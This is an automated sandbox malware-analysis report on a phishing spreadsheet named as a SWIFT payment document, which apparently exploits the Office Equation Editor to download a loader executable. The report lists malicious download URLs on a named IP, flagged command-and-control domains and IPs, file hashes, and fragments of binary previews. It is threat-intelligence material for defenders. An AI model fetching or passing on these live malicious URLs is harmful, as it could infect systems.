                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                http://search.ebay.com/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  http://www.gmarket.co.kr/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  • URL Reputation: safe
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  http://search.nifty.com/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    http://searchresults.news.com.au/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    http://www.google.si/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      http://www.google.cz/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        http://www.soso.com/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          http://www.univision.com/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            http://search.ebay.it/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              http://images.joins.com/ui_c/fvc_joins.icoexplorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                http://www.asharqalawsat.com/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                http://busca.orange.es/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://cnweb.search.live.com/results.aspx?q=explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://auto.search.msn.com/response.asp?MT=explorer.exe, 00000008.00000000.2184480582.000000000A330000.00000008.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://search.yahoo.co.jpexplorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      http://www.target.com/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://buscador.terra.es/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        http://search.orange.co.uk/favicon.icoexplorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        http://www.iask.com/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        http://www.tesco.com/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://cgi.search.biglobe.ne.jp/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          unknown
                                                                                                                                          http://search.seznam.cz/favicon.icoexplorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://suche.freenet.de/favicon.icoexplorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://search.interpark.com/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://clients5.google.com/complete/search?hl=explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://search.ipop.co.kr/favicon.icoexplorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  http://investor.msn.com/explorer.exe, 00000008.00000000.2168587227.0000000003C40000.00000002.00000001.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://search.espn.go.com/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://www.myspace.com/favicon.icoexplorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://search.centrum.cz/favicon.icoexplorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://p.zhongsou.com/favicon.icoexplorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          unknown
                                                                                                                                                          http://service2.bfast.com/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          unknown

                                                                                                                                                          Contacted IPs

                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                          • 75% < No. of IPs

                                                                                                                                                          Public

                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                          192.210.173.40
                                                                                                                                                          unknownUnited States
                                                                                                                                                          36352AS-COLOCROSSINGUStrue
                                                                                                                                                          62.149.128.40
                                                                                                                                                          www.scuolatua.comItaly
                                                                                                                                                          31034ARUBA-ASNITtrue
                                                                                                                                                          173.255.194.134
                                                                                                                                                          www.anthonysavillemiddleschool.comUnited States
                                                                                                                                                          63949LINODE-APLinodeLLCUStrue
                                                                                                                                                          64.227.87.162
                                                                                                                                                          melodezu.comUnited States
                                                                                                                                                          14061DIGITALOCEAN-ASNUStrue
                                                                                                                                                          184.168.131.241
                                                                                                                                                          envisionfordheights.comUnited States
                                                                                                                                                          26496AS-26496-GO-DADDY-COM-LLCUStrue
                                                                                                                                                          217.160.0.194
                                                                                                                                                          www.theshapecreator.comGermany
                                                                                                                                                          8560ONEANDONE-ASBrauerstrasse48DEtrue

                                                                                                                                                          General Information

                                                                                                                                                          Joe Sandbox Version:33.0.0 White Diamond
                                                                                                                                                          Analysis ID:452647
                                                                                                                                                          Start date:22.07.2021
                                                                                                                                                          Start time:17:21:57
                                                                                                                                                          Joe Sandbox Product:CloudBasic
                                                                                                                                                          Overall analysis duration:0h 11m 20s
                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                          Report type:light
                                                                                                                                                          Sample file name:Swift-Payment_Details.xlsx
                                                                                                                                                          Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                                                                          Number of analysed new started processes analysed:10
                                                                                                                                                          Number of new started drivers analysed:2
                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                                          Technologies:
                                                                                                                                                          • HCA enabled
                                                                                                                                                          • EGA enabled
                                                                                                                                                          • HDC enabled
                                                                                                                                                          • AMSI enabled
                                                                                                                                                          Analysis Mode:default
                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                          Detection:MAL
                                                                                                                                                          Classification:mal100.troj.expl.evad.winXLSX@9/13@6/6
                                                                                                                                                          EGA Information:Failed
                                                                                                                                                          HDC Information:
                                                                                                                                                          • Successful, ratio: 12.4% (good quality ratio 11.8%)
                                                                                                                                                          • Quality average: 73.5%
                                                                                                                                                          • Quality standard deviation: 26.3%
                                                                                                                                                          HCA Information:
                                                                                                                                                          • Successful, ratio: 97%
                                                                                                                                                          • Number of executed functions: 0
                                                                                                                                                          • Number of non-executed functions: 0
                                                                                                                                                          Cookbook Comments:
                                                                                                                                                          • Adjust boot time
                                                                                                                                                          • Enable AMSI
                                                                                                                                                          • Found application associated with file extension: .xlsx
                                                                                                                                                          • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                          • Attach to Office via COM
                                                                                                                                                          • Scroll down
                                                                                                                                                          • Close Viewer
                                                                                                                                                          Warnings:
                                                                                                                                                          Show All
                                                                                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, vga.dll, conhost.exe, svchost.exe
                                                                                                                                                          • TCP Packets have been reduced to 100
                                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                          • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.

                                                                                                                                                          Simulations

                                                                                                                                                          Behavior and APIs

                                                                                                                                                          TimeTypeDescription
                                                                                                                                                          17:23:09API Interceptor51x Sleep call for process: EQNEDT32.EXE modified
                                                                                                                                                          17:23:14API Interceptor35x Sleep call for process: vbc.exe modified
                                                                                                                                                          17:23:35API Interceptor228x Sleep call for process: wscript.exe modified
                                                                                                                                                          17:24:27API Interceptor1x Sleep call for process: explorer.exe modified

                                                                                                                                                          Joe Sandbox View / Context

                                                                                                                                                          IPs

                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                          192.210.173.40SWIFT MESSAGE DETAILS.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 192.210.173.40/files/loader1.exe
                                                                                                                                                          Ever Brilliant scan.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 192.210.173.40/files/loader2.exe
                                                                                                                                                          Payment Advice.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 192.210.173.40/files/loader2.exe
                                                                                                                                                          Payment_Ref_Advice.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 192.210.173.40/files/loader1.exe
                                                                                                                                                          Quotation_Request_DCW.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 192.210.173.40/files/loader1.exe
                                                                                                                                                          Quotation_Request_for_Customer.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 192.210.173.40/files/loader1.exe
                                                                                                                                                          Documents_Details-RFQ-Information.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 192.210.173.40/files/loader1.exe
                                                                                                                                                          FH_H1000_BMBH_HIGH_60290010852.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 192.210.173.40/files/loader2.exe
                                                                                                                                                          Documents_Details-Shipping-Information.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 192.210.173.40/files/loader1.exe
                                                                                                                                                          RemittanceAdviceNotification40097825604.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 192.210.173.40/files/loader2.exe
                                                                                                                                                          SHIPMENT_INFORMATION-DocumentsInvoices.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 192.210.173.40/files/loader1.exe
                                                                                                                                                          AYN0711743 - 0PFFCE1MA.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 192.210.173.40/files/loader2.exe
                                                                                                                                                          VSP-88D-Neo1-F YX20210315086 KSAI21061536.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 192.210.173.40/files/loader1.exe
                                                                                                                                                          PO 1032123 - 1032503.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 192.210.173.40/files/loader1.exe
                                                                                                                                                          L2.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 192.210.173.40/files/loader2.exe
                                                                                                                                                          Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 192.210.173.40/files/loader1.exe
                                                                                                                                                          MT103-payment confirmation.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 192.210.173.40/files/loader2.exe
                                                                                                                                                          Agency Appointment for Mv TBN Port-Appointment Letter- 2100133.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 192.210.173.40/files/loader1.exe

                                                                                                                                                          Domains

                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                          www.theshapecreator.comTeMdJqNMM0.exeGet hashmaliciousBrowse
                                                                                                                                                          • 217.160.0.194
                                                                                                                                                          4dvYb6Nq3y.exeGet hashmaliciousBrowse
                                                                                                                                                          • 217.160.0.194
                                                                                                                                                          www.scuolatua.comRq0Y7HegCd.exeGet hashmaliciousBrowse
                                                                                                                                                          • 62.149.128.40
                                                                                                                                                          0FKzNO1g3P.exeGet hashmaliciousBrowse
                                                                                                                                                          • 62.149.128.40
                                                                                                                                                          www.anthonysavillemiddleschool.comTeMdJqNMM0.exeGet hashmaliciousBrowse
                                                                                                                                                          • 45.33.2.79
                                                                                                                                                          7VGeqwDKdb.exeGet hashmaliciousBrowse
                                                                                                                                                          • 45.79.19.196
                                                                                                                                                          quote.exeGet hashmaliciousBrowse
                                                                                                                                                          • 45.56.79.23

                                                                                                                                                          ASN

                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                          AS-COLOCROSSINGUSPO20210722.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 172.245.119.43
                                                                                                                                                          USD_SLIP.docxGet hashmaliciousBrowse
                                                                                                                                                          • 198.46.132.159
                                                                                                                                                          o3ZUDIEL1vGet hashmaliciousBrowse
                                                                                                                                                          • 107.173.85.99
                                                                                                                                                          Invoice.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 198.12.81.125
                                                                                                                                                          BANKINV19072021LIMCA.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 192.227.129.35
                                                                                                                                                          aJw19xLGjcGet hashmaliciousBrowse
                                                                                                                                                          • 107.172.196.205
                                                                                                                                                          uqZ7bBFvVLGet hashmaliciousBrowse
                                                                                                                                                          • 107.172.196.205
                                                                                                                                                          9J7OaHH7ObGet hashmaliciousBrowse
                                                                                                                                                          • 107.172.196.205
                                                                                                                                                          QbdydvqPuuGet hashmaliciousBrowse
                                                                                                                                                          • 107.172.196.205
                                                                                                                                                          sphost.exeGet hashmaliciousBrowse
                                                                                                                                                          • 172.245.186.101
                                                                                                                                                          _VM_1064855583.HtMGet hashmaliciousBrowse
                                                                                                                                                          • 75.127.11.55
                                                                                                                                                          Inv-04_PDF.vbsGet hashmaliciousBrowse
                                                                                                                                                          • 192.227.128.168
                                                                                                                                                          Dvf7OP92yJGet hashmaliciousBrowse
                                                                                                                                                          • 104.170.143.71
                                                                                                                                                          PURCHASE ORDER 72021.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 198.12.81.125
                                                                                                                                                          Order Request for Quotation.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 198.12.91.134
                                                                                                                                                          Quotaton.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 198.12.81.125
                                                                                                                                                          SWIFT MESSAGE DETAILS.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 192.210.173.40
                                                                                                                                                          PI.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 198.23.207.48
                                                                                                                                                          ftpp.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 198.46.132.159
                                                                                                                                                          swift.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 198.23.207.48
                                                                                                                                                          ARUBA-ASNITXlojlgo2gbGet hashmaliciousBrowse
                                                                                                                                                          • 134.255.177.23
                                                                                                                                                          XfKsLIPLUuGet hashmaliciousBrowse
                                                                                                                                                          • 217.73.230.179
                                                                                                                                                          o0z4JJpYNfGet hashmaliciousBrowse
                                                                                                                                                          • 212.237.36.89
                                                                                                                                                          soa-032119.exeGet hashmaliciousBrowse
                                                                                                                                                          • 62.149.128.40
                                                                                                                                                          d6qU4nYIEp.exeGet hashmaliciousBrowse
                                                                                                                                                          • 89.46.109.25
                                                                                                                                                          1Ptfo0FZUMT7hlK.exeGet hashmaliciousBrowse
                                                                                                                                                          • 89.46.110.19
                                                                                                                                                          0VjjGsIIBB.exeGet hashmaliciousBrowse
                                                                                                                                                          • 217.61.51.61
                                                                                                                                                          WPxoHlbMVs.exeGet hashmaliciousBrowse
                                                                                                                                                          • 217.61.51.61
                                                                                                                                                          hiisl0XvrE.exeGet hashmaliciousBrowse
                                                                                                                                                          • 217.61.51.61
                                                                                                                                                          cCEP3pyVp8.exeGet hashmaliciousBrowse
                                                                                                                                                          • 217.61.51.61
                                                                                                                                                          pCCZmmulmJ.exeGet hashmaliciousBrowse
                                                                                                                                                          • 217.61.51.61
                                                                                                                                                          Rq0Y7HegCd.exeGet hashmaliciousBrowse
                                                                                                                                                          • 89.46.109.25
                                                                                                                                                          242jQP4mQP.exeGet hashmaliciousBrowse
                                                                                                                                                          • 89.46.109.25
                                                                                                                                                          RblUKpEC0p.exeGet hashmaliciousBrowse
                                                                                                                                                          • 89.46.107.249
                                                                                                                                                          N0vpYgIYpv.exeGet hashmaliciousBrowse
                                                                                                                                                          • 62.149.144.60
                                                                                                                                                          droxoUY6SU.exeGet hashmaliciousBrowse
                                                                                                                                                          • 62.149.144.56
                                                                                                                                                          0FKzNO1g3P.exeGet hashmaliciousBrowse
                                                                                                                                                          • 62.149.128.40
                                                                                                                                                          28Y753mbw5.exeGet hashmaliciousBrowse
                                                                                                                                                          • 80.88.87.243
                                                                                                                                                          7ujc2szSQX.exeGet hashmaliciousBrowse
                                                                                                                                                          • 80.88.87.243
                                                                                                                                                          Purchase_Order.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 80.88.87.243

                                                                                                                                                          JA3 Fingerprints

                                                                                                                                                          No context

                                                                                                                                                          Dropped Files

                                                                                                                                                          No context

                                                                                                                                                          Created / dropped Files

                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader1[1].exe
                                                                                                                                                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):188889
                                                                                                                                                          Entropy (8bit):7.939883976403979
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:TwjHmsbeuEz5qDDOapMygfwt3AA4fce6/1DQj5U+FS8EoESO:TwjHFrtYwxAAMu/1cj51FSDdSO
                                                                                                                                                          MD5:57F3AE2842FFB5CEEA386D0B97A52818
                                                                                                                                                          SHA1:68423398D025D3CBBB944EE4C3CEA5501DF67761
                                                                                                                                                          SHA-256:A0C7B3D44A5CFCDA917FC80C099DA5AB3DE582FF7C24F1373B4BD25F88D61E52
                                                                                                                                                          SHA-512:F398186C2F5ADB9726AAC3AEAD8289ABC9288404B4B39DBABC66494A77B0160CA560CF52C9F76B15B34619F150F516A74DB96DB967F75942F3C9F325C5DA4A81
                                                                                                                                                          Malicious:true
                                                                                                                                                          Reputation:low
                                                                                                                                                          IE Cache URL:http://192.210.173.40/files/loader1.exe
                                                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......l..{(dl((dl((dl(.{g()dl(.xb( dl(.{f(?dl(!..(#dl((dm(.dl(!..()dl(!..()dl(Rich(dl(........................PE..L....~.`.................6..........Z .......P....@..........................p..............................................0T..x....................................................................................P...............................text....4.......6.................. ..`.rdata..d....P.......:..............@..@.data........`.......D..............@...................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\13285AC3.png
                                                                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                          File Type:PNG image data, 816 x 552, 8-bit/color RGB, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):94963
                                                                                                                                                          Entropy (8bit):7.9700481154985985
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:U75cCbvD0PYFuxgYx30CS9ITdjq/DnjKqLqA/cx8zJjCKouoRwWH/EXXXXXXXXXB:kAPVZZ+oq/3TLPcx8zJjCXaWfEXXXXXB
                                                                                                                                                          MD5:17EC925977BED2836071429D7B476809
                                                                                                                                                          SHA1:7A176027FFD13AA407EF29EA42C8DDF7F0CC5D5C
                                                                                                                                                          SHA-256:83905385F5DF8E961CE87C8C4F5E2F470CBA3198A6C1ABB0258218D932DDF2E9
                                                                                                                                                          SHA-512:3E63730BC8FFEAD4A57854FEA1F1F137F52683734B68003480030DA77379EF6347115840280B63B75D61569B2F4F307B832241E3CEC23AD27A771F7B16D199A2
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                                                          Preview: .PNG........IHDR...0...(.....9.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....e.z...b.$..P ..^.Jd..8.........c..c..mF.&......F...[....Zk...>.g....{...U.T.S.'.O......eS`S`S`S`S`S`S`S..Q.{....._...?...g7.6.6.6.6.6.6.6......$......................!..c.?.).).).).).)..).=...+.....................}................x.....O.M.M.M.M.M.M.M..M...>....o.l.l.l.l.l..z.l@...&.................@.....C................+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1........................]............x....e..n............+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1..................?.....b..o.l.l.l.l.l.l.|`.l@...`.~S`S`S`S`S`S`S`..=.6.6.6.6.6.6.6.>0.6 ....?.).).).).).).).......................}..................l.M.M.M.M.M.M.M..L...>....o.l.l.l.l.l.l.l@.....................d.x...7.6.6.6.6.6.6.6 .s`S`S`S`S`S`S`S..S`...<...
                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\36C39151.jpeg
                                                                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                          File Type:[TIFF image data, big-endian, direntries=4], baseline, precision 8, 654x513, frames 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):62140
                                                                                                                                                          Entropy (8bit):7.529847875703774
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:S30U+TLdCuTO/G6VepVUxKHu9CongJvJsg:vCTbVKVzHu9ConWvJF
                                                                                                                                                          MD5:722C1BE1697CFCEAE7BDEFB463265578
                                                                                                                                                          SHA1:7D300A2BAB951B475477FAA308E4160C67AD93A9
                                                                                                                                                          SHA-256:2EE4908690748F50B261A796E6932FBCA10A79D83C316A9CEE92726CA4453DAE
                                                                                                                                                          SHA-512:2F38E0581397025674FA40B20E73B32D26F43851BE9A8DFA0B1655795CDC476A5171249D1D8D383693775ED9F132FA6BB56D92A8949191738AF05DA053C4E561
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                                                          Preview: ......JFIF.....`.`......Exif..MM.*.......;.........J.i.........R.......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\377AB00B.emf
                                                                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):7608
                                                                                                                                                          Entropy (8bit):5.083849804271274
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:+ScYL6BGj/MQU8DbwiMOtWmVz76F2MqdTfOYL/xRp7uGkmrI:5cojU+H3tWa6WdTfOYLpR8d
                                                                                                                                                          MD5:50C7BF76D4BEA600FD551E5703ABB71C
                                                                                                                                                          SHA1:7FF272F8941E094F1BB97C7DECB324A9B90250C5
                                                                                                                                                          SHA-256:4CFDABA80F95C466FD26E34FEDE809B8C80799A22D41335365E5CB919E6A2A8D
                                                                                                                                                          SHA-512:3329723D2C78EE0902966A243A4EC8BC6D24B9B342AA0E4FCF76F9575A517E2E142271B82F4E3B8A39ED558B662FEE4FA6BC78A7E0A24F3B71E5F1E82E147AB3
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview: ....l...,...........<................... EMF................................8...X....................?..................................C...R...p...................................S.e.g.o.e. .U.I.....................................................6.).X.....K.d...................T.7...7....p....\...T.7.....T.7...7....p....T.7..6Pv...p....`..p.6..$y.v8J....W.....x.7....v....$.....#.d.........7..^.p.....^.p.F..8J...pz...W.-.....7..<.v................<.>v.Z.v....X..o.....6.........................vdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .............................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\69EB80DC.jpeg
                                                                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):85020
                                                                                                                                                          Entropy (8bit):7.2472785111025875
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
                                                                                                                                                          MD5:738BDB90A9D8929A5FB2D06775F3336F
                                                                                                                                                          SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
                                                                                                                                                          SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
                                                                                                                                                          SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\80257087.png
                                                                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                          File Type:PNG image data, 816 x 552, 8-bit/color RGB, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):94963
                                                                                                                                                          Entropy (8bit):7.9700481154985985
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:U75cCbvD0PYFuxgYx30CS9ITdjq/DnjKqLqA/cx8zJjCKouoRwWH/EXXXXXXXXXB:kAPVZZ+oq/3TLPcx8zJjCXaWfEXXXXXB
                                                                                                                                                          MD5:17EC925977BED2836071429D7B476809
                                                                                                                                                          SHA1:7A176027FFD13AA407EF29EA42C8DDF7F0CC5D5C
                                                                                                                                                          SHA-256:83905385F5DF8E961CE87C8C4F5E2F470CBA3198A6C1ABB0258218D932DDF2E9
                                                                                                                                                          SHA-512:3E63730BC8FFEAD4A57854FEA1F1F137F52683734B68003480030DA77379EF6347115840280B63B75D61569B2F4F307B832241E3CEC23AD27A771F7B16D199A2
                                                                                                                                                          Malicious:false
